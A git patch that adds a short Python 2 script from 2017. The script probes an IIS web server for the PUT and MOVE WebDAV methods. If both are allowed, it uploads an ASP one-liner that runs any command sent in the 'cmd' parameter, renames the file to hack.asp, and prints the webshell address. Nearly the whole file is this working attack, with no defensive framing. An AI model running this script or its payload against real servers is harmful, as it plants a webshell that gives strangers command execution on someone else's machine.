From a2ab65e7576db522cac9d10ec58f3588d445ac43 Mon Sep 17 00:00:00 2001
From: 0c0c0f <892850447@qq.com>
Date: Wed, 15 Feb 2017 12:30:25 +0800
Subject: [PATCH] Create IIS_Put_File.py

https://gist.github.com/lijiejie/3eb6c4a1db9b3fe3c59a
---
 service/IIS_Put_File.py | 36 ++++++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 service/IIS_Put_File.py

diff --git a/service/IIS_Put_File.py b/service/IIS_Put_File.py
new file mode 100644
index 0000000..38c2d2e
--- /dev/null
+++ b/service/IIS_Put_File.py
@@ -0,0 +1,36 @@
+#-*- encoding:utf-8 -*-
+
+'''
+IIS put file From http://www.lijiejie.com
+
+Usage:
+    iisPUT.py www.example.com:8080
+'''
+
+import httplib
+import sys
+
+try:
+    conn = httplib.HTTPConnection(sys.argv[1])
+    conn.request(method='OPTIONS', url='/')
+    headers = dict(conn.getresponse().getheaders())
+    if headers.get('server', '').find('Microsoft-IIS') < 0:
+        print 'This is not an IIS web server'
+        
+    if 'public' in headers and \
+       headers['public'].find('PUT') > 0 and \
+       headers['public'].find('MOVE') > 0:
+        conn.close()
+        conn = httplib.HTTPConnection(sys.argv[1])
+        # PUT hack.txt
+        conn.request( method='PUT', url='/hack.txt', body='<%execute(request("cmd"))%>' )
+        conn.close()
+        conn = httplib.HTTPConnection(sys.argv[1])
+        # mv hack.txt to hack.asp
+        conn.request(method='MOVE', url='/hack.txt', headers={'Destination': '/hack.asp'})
+        print 'ASP webshell:', 'http://' + sys.argv[1] + '/hack.asp'
+    else:
+        print 'Server not vulnerable'
+        
+except Exception,e:
+    print 'Error:', e